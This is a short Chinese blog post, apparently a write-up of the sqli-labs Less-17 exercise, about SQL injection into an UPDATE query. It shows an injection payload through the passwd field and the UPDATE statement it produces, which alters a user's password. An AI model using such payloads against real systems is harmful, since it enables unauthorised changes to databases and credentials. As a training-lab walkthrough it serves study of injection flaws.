心 空

  • Tools
Ricky Hao
  1. 首页
  2. SQLLAB
  3. 正文

Less-17 Update Query

29 8 月, 2015 1622点热度 0人点赞 0条评论

因为是UPDATE语句,所以最好还是把剩下的WHERE username='admin'补上,不然可能所有人密码都变了。
所以可以构造的语句是:

uname=admin&passwd=211' WHERE username='admin' and 1=2#&submit=Submit

对应的SQL语句为

UPDATE users SET password = '211' WHERE username='admin' and 1=2#' WHERE username='admin'
本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
标签: sql sqllab
最后更新:29 8 月, 2015

Ricky

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

这个站点使用 Akismet 来减少垃圾评论。了解你的评论数据如何被处理。

COPYRIGHT © 2025 心 空. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang